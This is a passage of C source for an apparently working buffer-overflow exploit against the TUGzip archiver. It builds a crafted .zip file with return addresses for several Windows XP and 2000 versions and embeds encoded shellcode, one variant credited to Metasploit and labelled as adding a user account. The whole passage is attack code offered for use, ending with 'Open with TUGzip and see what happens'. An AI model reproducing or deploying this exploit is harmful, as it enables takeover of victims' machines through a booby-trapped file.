"ylzHOTM0KPkP2kQ5OL2kQlKUt8kQzOtK0On82k1OO0KQ8kpIDKoDTKKQXnnQ7P4Y4lU4upptm7i1WZLM"
"kQWRJKJTMkpTLdzdt59UdKooktkQzKOv4KlLNkDKooMLyqZKBkMLRkzajKQyQLmTM45sNQUpotRkmplp"
"tEupQhlLBkoPlLRkRPKlvMRkoxjhzKKYtKqpFPkPm0KPbkphMlaOlqhvqPPVriJXCS5pCKNpOxJO8Nk0"
"C0c8eHKNqzznPW9oyW1SBMotnNaUQhaUkpNOpckpRNOuqdmPRUpsqUPrmP%skp%s"
"mPnOQ1OTNdo0mVMVMPpnOurTMP0lBOqS31PlC7prpobU0pkpoQotPmoyPn1YT3ptT2aQPtpo1bBSkp%s"
"MPNOOQa4oTkPA";
//ADD USER shellcode TNX to metasploit
char shellcode_2[]=
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x50"
"\x8a\xfa\x90\x83\xeb\xfc\xe2\xf4\xac\xe0\x11\xdd\xb8\x73\x05\x6f"
"\xaf\xea\x71\xfc\x74\xae\x71\xd5\x6c\x01\x86\x95\x28\x8b\x15\x1b"
"\x1f\x92\x71\xcf\x70\x8b\x11\xd9\xdb\xbe\x71\x91\xbe\xbb\x3a\x09"
"\xfc\x0e\x3a\xe4\x57\x4b\x30\x9d\x51\x48\x11\x64\x6b\xde\xde\xb8"
"\x25\x6f\x71\xcf\x74\x8b\x11\xf6\xdb\x86\xb1\x1b\x0f\x96\xfb\x7b"
"\x53\xa6\x71\x19\x3c\xae\xe6\xf1\x93\xbb\x21\xf4\xdb\xc9\xca\x1b"
"\x10\x86\x71\xe0\x4c\x27\x71\xd0\x58\xd4\x92\x1e\x1e\x84\x16\xc0"
"\xaf\x5c\x9c\xc3\x36\xe2\xc9\xa2\x38\xfd\x89\xa2\x0f\xde\x05\x40"
"\x38\x41\x17\x6c\x6b\xda\x05\x46\x0f\x03\x1f\xf6\xd1\x67\xf2\x92"
"\x05\xe0\xf8\x6f\x80\xe2\x23\x99\xa5\x27\xad\x6f\x86\xd9\xa9\xc3"
"\x03\xd9\xb9\xc3\x13\xd9\x05\x40\x36\xe2\xeb\xcc\x36\xd9\x73\x71"
"\xc5\xe2\x5e\x8a\x20\x4d\xad\x6f\x86\xe0\xea\xc1\x05\x75\x2a\xf8"
"\xf4\x27\xd4\x79\x07\x75\x2c\xc3\x05\x75\x2a\xf8\xb5\xc3\x7c\xd9"
"\x07\x75\x2c\xc0\x04\xde\xaf\x6f\x80\x19\x92\x77\x29\x4c\x83\xc7"
"\xaf\x5c\xaf\x6f\x80\xec\x90\xf4\x36\xe2\x99\xfd\xd9\x6f\x90\xc0"
"\x09\xa3\x36\x19\xb7\xe0\xbe\x19\xb2\xbb\x3a\x63\xfa\x74\xb8\xbd"
"\xae\xc8\xd6\x03\xdd\xf0\xc2\x3b\xfb\x21\x92\xe2\xae\x39\xec\x6f"
"\x25\xce\x05\x46\x0b\xdd\xa8\xc1\x01\xdb\x90\x91\x01\xdb\xaf\xc1"
"\xaf\x5a\x92\x3d\x89\x8f\x34\xc3\xaf\x5c\x90\x6f\xaf\xbd\x05\x40"
"\xdb\xdd\x06\x13\x94\xee\x05\x46\x02\x75\x2a\xf8\x2e\x52\x18\xe3"
"\x03\x75\x2c\x6f\x80\x8a\xfa\x90";
struct addresses
{ char *platform;
unsigned long addr;
}
targets[]=
{
{ "[*]Microsoft Windows XP 5.1.1.0 SP1 (IA32)English(jmp esp)",0x778eadcf },
{ "[*]Microsoft Windows Pro sp3 English (call esp)",0x7C8369F0 },
{ "[*]Microsoft Windows Pro sp3 English (jmp esp)",0x7C86467B },
{ "[*]Windows XP 5.1.2.0 SP2 (IA32) English (jmp esp)",0x7d184de7 },
{ "[*]Windows XP 5.1.2.0 SP2 (IA32) German (jmp esp)",0x77d85197 },
{ "[*]Windows 2000 5.0.1.0 SP1 (IA32) English (jmp esp)",0x69952208 },
{ "[*]Crash the program",0x58585858 },
{NULL }
};
int main(int argc,char *argv[])
{ FILE *h;
char *buffer;
buffer=(char *)malloc(sizeof(file_1)+sizeof(file_2));
unsigned int offset=0;
int number;
unsigned int retaddress=targets[atoi(argv[2])].addr;
if(argc<2)
{ printf("# \tChose your Platform #\n");
for(int i=0;targets[i].platform;i++)
printf("%d \t\t %s\n",i,targets[i].platform);
printf("\tUsage is:\n");
printf(argv[0]);
printf(".exe ");
printf("filename.zip ");
printf("platform\n");
printf("\t*****Credits for exploit and finding the bug go to Stefan Marin******\n");
system("color 02");
Sleep(2000);
return 0;
}
if((h=fopen(argv[1],"wb"))==NULL)
{ printf("error\n");
exit(0);
}
memcpy(buffer,file_1,sizeof(file_1)); offset=sizeof(file_1);
memcpy(buffer+offset-1,file_2,sizeof(file_2)); offset=OFFSET;
memcpy(buffer+offset,&retaddress,4); offset=0; offset=NOP;
memset(buffer+offset,0x90,20);
printf("#___________________________________________________________________________#\n");
printf("Now chose your shellcode \n");
printf("Press [1] for Alphanumeric shellcode\n");
printf("Press [2] for NonAphanumeric shellcode\n");
printf("#___________________________________________________________________________#\n");
scanf("%d",&number);
switch(number)
{ case 1:
offset=shellcode_offset;
memcpy(buffer+offset,shellcode_1,sizeof(shellcode_1));
case 2:
offset=shellcode_offset;
memcpy(buffer+offset,shellcode_2,sizeof(shellcode_2));
}
fwrite(buffer,1,sizeof(file_1)+sizeof(file_2),h);
printf("Building file ...\n");
printf("Done ! Open with TUGzip and see what happens :) \n");
printf("\t*****Credits for exploit and finding the bug go to Stefan Marin******\n");
fclose(h);
free(buffer);
return 0;
}